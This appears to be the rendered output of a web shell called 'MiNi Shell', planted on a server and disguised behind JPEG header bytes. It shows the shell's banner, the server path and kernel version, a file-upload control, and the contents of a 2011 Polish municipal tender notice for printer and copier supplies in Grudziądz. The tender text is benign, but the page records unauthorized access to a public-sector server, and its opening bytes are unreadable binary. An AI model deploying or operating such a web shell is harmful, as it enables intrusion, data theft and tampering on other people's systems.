JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110314/82535-N-2011.html

<p class="kh_header"><b>Grudziądz: Dostawa materiałów eksploatacyjnych do drukarek, kserokopiarek, faksów oraz pozostałych materiałów eksploatacyjnych na potrzeby Urzędu Miejskiego w Grudziądzu na 2011 r.</b><br>
<b>Numer ogłoszenia: 82535 - 2011; data zamieszczenia: 14.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Grudziądz , ul. Ratuszowa 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 4510233, faks 56 4510233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.grudziadz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek, kserokopiarek, faksów oraz pozostałych materiałów eksploatacyjnych na potrzeby Urzędu Miejskiego w Grudziądzu na 2011 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa  materiałów eksploatacyjnych do drukarek, kserokopiarek, faksów oraz pozostałych materiałów eksploatacyjnych. Szczegółowy opis potrzeb Zamawiającego, zawierający typ sprzętu jakim dysponuje Zamawiający zawierają Załącznik nr 1 i 2  do  specyfikacji istotnych warunków zamówienia. 
Zamawiający dopuszcza składanie ofert na materiały eksploatacyjne równoważne. 
1.	W przypadku zaoferowania materiałów eksploatacyjnych równoważnych, produkty te muszą być  kompatybilne ze sprzętem, do których są zamawiane, o parametrach takich samych bądź lepszych (pojemność, wydajność i jakość wydruku) w stosunku do oryginału produkowanego przez producenta urządzenia. Wykonawca, który oferuje materiały eksploatacyjne równoważne, zobowiązuje się do:
a)	zwrotu kosztów naprawy urządzenia, jeżeli bezpośrednią przyczyną awarii będzie zastosowanie dostarczonego materiału eksploatacyjnego,
b)	bezpłatną wymianę urządzenia na nowe, jeżeli bezpośrednią przyczyną awarii będzie zastosowanie dostarczonych materiałów eksploatacyjnych, a naprawa nie przywróci jego poprzedniej użyteczności,
c)	w sytuacji, gdy Zamawiający w wyniku zastosowania dostarczonych materiałów eksploatacyjnych utraci gwarancję producenta urządzenia, Wykonawca przejmie wszelkie obowiązki gwarancyjne dotyczące urządzeń.
2.	Dostarczone materiały eksploatacyjne muszą być w 100% nowe, nie regenerowane, nie refabrykowane i nie napełniane.
3.	Materiały eksploatacyjne muszą posiadać oznaczenie produktu - znak firmowy (np. logo producenta lub symbol), termin ważności lub datę produkcji. Jeżeli w trakcie realizacji umowy Zamawiający stwierdzi, że wydajność, jakość lub niezawodność dostarczonych produktów niekorzystnie odbiega od wymagań producenta sprzętu (drukarek) Wykonawca zobowiązuje się do gwarancyjnej wymiany produktu na  nowy, wolny od wad w terminie 48 godzin (w dni robocze) od momentu zgłoszenia przez Zamawiającego o wadliwym produkcie (mailem lub faksem). Wymiana nastąpi w siedzibie Zamawiającego na koszt i ryzyko Wykonawcy.
4.	Okres gwarancji na dostarczane materiały eksploatacyjne musi wynosić co najmniej 12 miesięcy. Okres gwarancji będzie liczony od daty odbioru przedmiotu zamówienia, bez zastrzeżeń,
5.	W przypadku  ujawnienia w okresie gwarancji  uszkodzeń, wad lub niesprawności materiałów eksploatacyjnych, Wykonawca zobowiązany będzie dostarczyć nowe, wolne od wad, w terminie nie dłuższym niż 5 dni roboczych od dnia zgłoszenia przez Zamawiającego drogą telefoniczną, faksem, pisemnie lub e-mailem.
6.	W przypadku konieczności sporządzenia ekspertyzy technicznej dotyczącej dostarczonych materiałów eksploatacyjnych, koszty wykonania ekspertyzy poniesie Wykonawca.
7.	Ilości wskazane w Załącznikach do siwz są wielkościami orientacyjnymi, przyjętymi dla porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy z którym Zamawiający zawrze umowę nie przysługuje roszczenie o realizację dostawy w wielkościach wskazanych w Załącznikach.
8.	Wykonawca dostarczy zamówione materiały eksploatacyjne swoim transportem, w terminie 5 dni roboczych do siedziby Zamawiającego w godz. 8:00 - 15:00 poniedziałek-piątek.
9.	Wykonawca odbierze nieodpłatnie z siedziby Zamawiającego zużyte materiały eksploatacyjne , a takie wydanie nastąpi na podstawie protokołu przekazania. Wykonawca zobowiązany jest wystawić kartę przekazania odpadu.

Przedmiotem zamówienia jest ponadto sukcesywna dostawa pozostałych materiałów eksploatacyjnych tj. płyt CD/DVD/Blue-ray, wentylatorów, myszek, klawiatur, środków  czystości. Szczegółowy opis potrzeb Zamawiającego oraz orientacyjne ilości dostaw zawiera Załącznik nr 3 do specyfikacji istotnych warunków zamówienia. 
 
1)	Wymaga się, aby oferowane materiały posiadały gwarancję minimalnie na okres wskazany w Załączniku nr 3.
2)	W przypadku  ujawnienia, w okresie gwarancji  uszkodzeń, wad lub niesprawności materiałów eksploatacyjnych, Wykonawca zobowiązany będzie dostarczyć nowe, wolne od wad, w terminie nie dłuższym niż 5 dni roboczych od dnia zgłoszenia przez Zamawiającego drogą telefoniczną, faksem, pisemnie lub e-mailem.
3)	W przypadku konieczności sporządzenia ekspertyzy technicznej dotyczącej dostarczonych materiałów eksploatacyjnych, koszty wykonania ekspertyzy poniesie Wykonawca.
4)	Ilości wskazane w Załączniku nr 3 do siwz są wielkościami orientacyjnymi, przyjętymi dla  porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy z którym Zamawiający zawrze umowę nie przysługuje roszczenie o realizację dostawy w wielkościach wskazanych w Załączniku nr 3.
5)	  Wykonawca dostarczy zamówione materiały eksploatacyjne swoim transportem, w terminie 5 dni roboczych do siedziby Zamawiającego w godz. 8:00 - 15:00 poniedziałek-piątek.


	
	
 Podwykonawcy:
Wykonawca, który zamierza powierzyć podwykonawcom wykonanie jakiejkolwiek części zamówienia, zobowiązany jest wskazać na druku oferty zakresy zamówienia powierzane podwykonawcom. Brak jakiejkolwiek wzmianki w tym zakresie na formularzu oferty, będzie uznawane za stwierdzenie samodzielnego wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.00-2, 30.19.23.00-0, 30.23.70.00-9, 30.23.40.00-8, 24.11.32.00-1, 39.71.71.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie    Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie:
Część 1.  zrealizował  min. 1 dostawę materiałów eksploatacyjnych do drukarek  o    wartości      min. 40.000,00 zł brutto
Część 2. zrealizował min. 1 dostawę materiałów eksploatacyjnych do kserokopiarek i faksów o wartości min. 20.000,00 zł brutto
Część 3.  Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie    Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie    Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie    Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie    Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo - jeżeli dotyczy
2. Formularz cenowy - na zaoferowaną część</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.grudziadz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Biuro Informatyki, ul. Ratuszowa 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2011 godzina 09:30, miejsce: Urząd Miejski, Biuro Zamówień Publicznych, ul. Ratuszowa 1, 86-300 Grudziądz, pok. 114.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa  materiałów eksploatacyjnych do drukarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa  materiałów eksploatacyjnych do drukarek. Szczegółowy opis potrzeb Zamawiającego, zawierający typ sprzętu jakim dysponuje Zamawiający i rodzaj materiału eksploatacyjnego zalecanego przez producenta sprzętu oraz orientacyjne ilości dostaw zawiera Załącznik nr 1  do niniejszej specyfikacji istotnych warunków zamówienia. 
Zamawiający dopuszcza składanie ofert na materiały eksploatacyjne równoważne. 
1.	W przypadku zaoferowania materiałów eksploatacyjnych równoważnych, produkty te muszą być  kompatybilne ze sprzętem, do których są zamawiane, o parametrach takich samych bądź lepszych (pojemność, wydajność i jakość wydruku) w stosunku do oryginału produkowanego przez producenta urządzenia. Wykonawca, który oferuje materiały eksploatacyjne równoważne, zobowiązuje się do:
a)	zwrotu kosztów naprawy urządzenia, jeżeli bezpośrednią przyczyną awarii będzie zastosowanie dostarczonego materiału eksploatacyjnego,
b)	bezpłatną wymianę urządzenia na nowe, jeżeli bezpośrednią przyczyną awarii będzie zastosowanie dostarczonych materiałów eksploatacyjnych, a naprawa nie przywróci jego poprzedniej użyteczności,
c)	w sytuacji, gdy Zamawiający w wyniku zastosowania dostarczonych materiałów eksploatacyjnych utraci gwarancję producenta urządzenia, Wykonawca przejmie wszelkie obowiązki gwarancyjne dotyczące urządzeń.
2.	Dostarczone materiały eksploatacyjne muszą być w 100% nowe, nie regenerowane, nie refabrykowane i nie napełniane.
3.	Materiały eksploatacyjne muszą posiadać oznaczenie produktu - znak firmowy (np. logo producenta lub symbol), termin ważności lub datę produkcji. Jeżeli w trakcie realizacji umowy Zamawiający stwierdzi, że wydajność, jakość lub niezawodność dostarczonych produktów niekorzystnie odbiega od wymagań producenta sprzętu (drukarek) Wykonawca zobowiązuje się do gwarancyjnej wymiany produktu na  nowy, wolny od wad w terminie 48 godzin (w dni robocze) od momentu zgłoszenia przez Zamawiającego o wadliwym produkcie (mailem lub faksem). Wymiana nastąpi w siedzibie Zamawiającego na koszt i ryzyko Wykonawcy.
4.	Okres gwarancji na dostarczane materiały eksploatacyjne musi wynosić co najmniej 12 miesięcy. Okres gwarancji będzie liczony od daty odbioru przedmiotu zamówienia, bez zastrzeżeń,
5.	W przypadku  ujawnienia w okresie gwarancji  uszkodzeń, wad lub niesprawności materiałów eksploatacyjnych, Wykonawca zobowiązany będzie dostarczyć nowe, wolne od wad, w terminie nie dłuższym niż 5 dni roboczych od dnia zgłoszenia przez Zamawiającego drogą telefoniczną, faksem, pisemnie lub e-mailem.
6.	W przypadku konieczności sporządzenia ekspertyzy technicznej dotyczącej dostarczonych materiałów eksploatacyjnych, koszty wykonania ekspertyzy poniesie Wykonawca.
7.	Ilości wskazane w Załączniku nr 1 do siwz są wielkościami orientacyjnymi, przyjętymi dla porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy z którym Zamawiający zawrze umowę nie przysługuje roszczenie o realizację dostawy w wielkościach wskazanych w Załączniku nr 1.
8.	Wykonawca dostarczy zamówione materiały eksploatacyjne swoim transportem, w terminie 5 dni roboczych do siedziby Zamawiającego w godz. 8:00 - 15:00 poniedziałek-piątek.
9.	Wykonawca odbierze nieodpłatnie z siedziby Zamawiającego zużyte materiały eksploatacyjne , a takie wydanie nastąpi na podstawie protokołu przekazania. Wykonawca zobowiązany jest wystawić kartę przekazania odpadu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.00-2, 30.19.23.00-4, 30.12.51.10-5, 30.19.23.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa  materiałów eksploatacyjnych do kserokopiarek i faksów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa  materiałów eksploatacyjnych do kserokopiarek i faksów. Szczegółowy opis potrzeb Zamawiającego, zawierający typ sprzętu jakim dysponuje Zamawiający i rodzaj materiału eksploatacyjnego zalecanego przez producenta sprzętu oraz orientacyjne ilości dostaw zawiera Załącznik nr 2 do niniejszej specyfikacji istotnych warunków zamówienia. 
Zamawiający dopuszcza składanie ofert na materiały eksploatacyjne równoważne. 
1.	W przypadku zaoferowania materiałów eksploatacyjnych równoważnych, produkty te muszą być  kompatybilne ze sprzętem, do których są zamawiane, o parametrach takich samych bądź lepszych (pojemność, wydajność i jakość wydruku) w stosunku do oryginału produkowanego przez producenta urządzenia. Wykonawca, który oferuje materiały eksploatacyjne równoważne, zobowiązuje się do:
a)	zwrotu kosztów naprawy urządzenia, jeżeli bezpośrednią przyczyną awarii będzie zastosowanie dostarczonego materiału eksploatacyjnego,
b)	bezpłatną wymianę urządzenia na nowe, jeżeli bezpośrednią przyczyną awarii będzie zastosowanie dostarczonych materiałów eksploatacyjnych, a naprawa nie przywróci jego poprzedniej użyteczności,
c)	w sytuacji, gdy Zamawiający w wyniku zastosowania dostarczonych materiałów eksploatacyjnych utraci gwarancję producenta urządzenia, Wykonawca przejmie wszelkie obowiązki gwarancyjne dotyczące urządzeń.
2.	Dostarczone materiały eksploatacyjne muszą być w 100% nowe, nie regenerowane, nie refabrykowane i nie napełniane.
3.	Materiały eksploatacyjne muszą posiadać oznaczenie produktu - znak firmowy (np. logo producenta lub symbol), termin ważności lub datę produkcji. Jeżeli w trakcie realizacji umowy Zamawiający stwierdzi, że wydajność, jakość lub niezawodność dostarczonych produktów niekorzystnie odbiega od wymagań producenta sprzętu (kserokopiarek, faksów) Wykonawca zobowiązuje się do gwarancyjnej wymiany produktu na  nowy, wolny od wad w terminie 48 godzin (w dni robocze) od momentu zgłoszenia przez Zamawiającego o wadliwym produkcie (mailem lub faksem). Wymiana nastąpi w siedzibie Zamawiającego na koszt i ryzyko Wykonawcy.
4.	Okres gwarancji na dostarczane materiały eksploatacyjne musi wynosić co najmniej 12 miesięcy. Okres gwarancji będzie liczony od daty odbioru przedmiotu zamówienia, bez zastrzeżeń,
5.	W przypadku  ujawnienia w okresie gwarancji  uszkodzeń, wad lub niesprawności materiałów eksploatacyjnych, Wykonawca zobowiązany będzie dostarczyć nowe, wolne od wad, w terminie nie dłuższym niż 5 dni roboczych od dnia zgłoszenia przez Zamawiającego drogą telefoniczną, faksem, pisemnie lub e-mailem.
6.	W przypadku konieczności sporządzenia ekspertyzy technicznej dotyczącej dostarczonych materiałów eksploatacyjnych, koszty wykonania ekspertyzy poniesie Wykonawca.
7.	Ilości wskazane w Załączniku nr 2 do siwz są wielkościami orientacyjnymi, przyjętymi dla porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy z którym Zamawiający zawrze umowę nie przysługuje roszczenie o realizację dostawy w wielkościach wskazanych w Załączniku nr 2.

8.	Wykonawca dostarczy zamówione materiały eksploatacyjne swoim transportem, w terminie 5 dni roboczych do siedziby Zamawiającego w godz. 8:00 - 15:00 poniedziałek-piątek.
9.	Wykonawca odbierze nieodpłatnie z siedziby Zamawiającego zużyte materiały eksploatacyjne, a takie wydanie nastąpi na podstawie protokołu przekazania. Wykonawca zobowiązany jest wystawić kartę przekazania odpadu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.40-6, 30.12.51.20-8, 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa pozostałych materiałów eksploatacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa pozostałych materiałów eksploatacyjnych tj. płyt CD/DVD/Blue-ray, wentylatorów, myszek, klawiatur, środków  czystości. Szczegółowy opis potrzeb Zamawiającego oraz orientacyjne ilości dostaw zawiera Załącznik nr 3 do niniejszej specyfikacji istotnych warunków zamówienia. 
 
1)	Wymaga się, aby oferowane materiały posiadały gwarancję minimalnie na okres wskazany w Załączniku nr 3.
2)	W przypadku  ujawnienia, w okresie gwarancji  uszkodzeń, wad lub niesprawności materiałów eksploatacyjnych, Wykonawca zobowiązany będzie dostarczyć nowe, wolne od wad, w terminie nie dłuższym niż 5 dni roboczych od dnia zgłoszenia przez Zamawiającego drogą telefoniczną, faksem, pisemnie lub e-mailem.
3)	W przypadku konieczności sporządzenia ekspertyzy technicznej dotyczącej dostarczonych materiałów eksploatacyjnych, koszty wykonania ekspertyzy poniesie Wykonawca.
4)	Ilości wskazane w Załączniku nr 3 do siwz są wielkościami orientacyjnymi, przyjętymi dla  porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy z którym Zamawiający zawrze umowę nie przysługuje roszczenie o realizację dostawy w wielkościach wskazanych w Załączniku nr 3.
5)	  Wykonawca dostarczy zamówione materiały eksploatacyjne swoim transportem, w terminie 5 dni roboczych do siedziby Zamawiającego w godz. 8:00 - 15:00 poniedziałek-piątek..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.23.40-6, 30.12.51.20-8, 30.12.51.10-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com